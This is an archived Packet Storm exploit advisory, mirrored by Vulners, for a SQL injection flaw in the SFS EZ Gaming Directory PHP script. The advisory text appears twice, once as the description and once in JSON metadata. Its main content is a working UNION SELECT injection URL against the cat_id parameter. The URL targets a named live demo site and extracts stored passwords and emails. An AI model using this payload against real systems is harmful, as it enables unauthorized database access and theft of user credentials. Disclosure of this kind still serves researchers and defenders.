Search...

sfsezgaming-sql.txt

2008-10-31T00:00:00

ID PACKETSTORM:71420
Type packetstorm
Reporter Hurley
Modified 2008-10-31T00:00:00

Description

                                        
                                            `==================================================================================  
SFS EZ Gaming Directory (directory.php id) Remote SQL Injection Vulnerability  
==================================================================================  
__ __ __   
/ / / /_ _______/ /__ __ __  
/ /_/ / / / / ___/ / _ \/ / / /  
/ __ / /_/ / / / / __/ /_/ /   
/_/ /_/\__,_/_/ /_/\___/\__, /   
/____/   
==================================================================================  
----------------------------------------------------------------------------------  
Website script: http://www.scripts-for-sites.info/index.php  
----------------------------------------------------------------------------------  
Exploit: http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit]  
----------------------------------------------------------------------------------  
LiveDemo:  
http://www.turnkeyzone.com/demos/gaming/directory.php?ax=list&l=list_by&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/*  
----------------------------------------------------------------------------------  
==================================================================================  
Special Thx : Darckc0de  
==================================================================================  
  
  
`

JSON Vulners Source

Initial Source

{"type": "packetstorm", "published": "2008-10-31T00:00:00", "reporter": "Hurley", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "0445b7f04da071856e136e856cbb9af2"}, {"key": "modified", "hash": "8f370b65bbb7a81c6bf369c025de647a"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "8f370b65bbb7a81c6bf369c025de647a"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a4861eaa59bc3172cff7dc76d0c1f913"}, {"key": "sourceData", "hash": "b2bfb247baea3044f530d63a8a40a97d"}, {"key": "sourceHref", "hash": "5c0eec773f6b0f89f6c5c8e560af6d56"}, {"key": "title", "hash": "429fb804025ca91cde7ba15233449849"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`================================================================================== \nSFS EZ Gaming Directory (directory.php id) Remote SQL Injection Vulnerability \n================================================================================== \n__ __ __ \n/ / / /_ _______/ /__ __ __ \n/ /_/ / / / / ___/ / _ \\/ / / / \n/ __ / /_/ / / / / __/ /_/ / \n/_/ /_/\\__,_/_/ /_/\\___/\\__, / \n/____/ \n================================================================================== \n---------------------------------------------------------------------------------- \nWebsite script: http://www.scripts-for-sites.info/index.php \n---------------------------------------------------------------------------------- \nExploit: http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit] \n---------------------------------------------------------------------------------- \nLiveDemo: \nhttp://www.turnkeyzone.com/demos/gaming/directory.php?ax=list&l=list_by&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/* \n---------------------------------------------------------------------------------- \n================================================================================== \nSpecial Thx : Darckc0de \n================================================================================== \n \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:26:29", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/71420/sfsezgaming-sql.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/71420/sfsezgaming-sql.txt", "title": "sfsezgaming-sql.txt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "references": [], "id": "PACKETSTORM:71420", "hash": "cbfab6b99c5308f9ffb04cf0875f7145bba684c9cee580d1feaef8a02fdf5707", "edition": 1, "cvelist": [], "modified": "2008-10-31T00:00:00", "description": ""}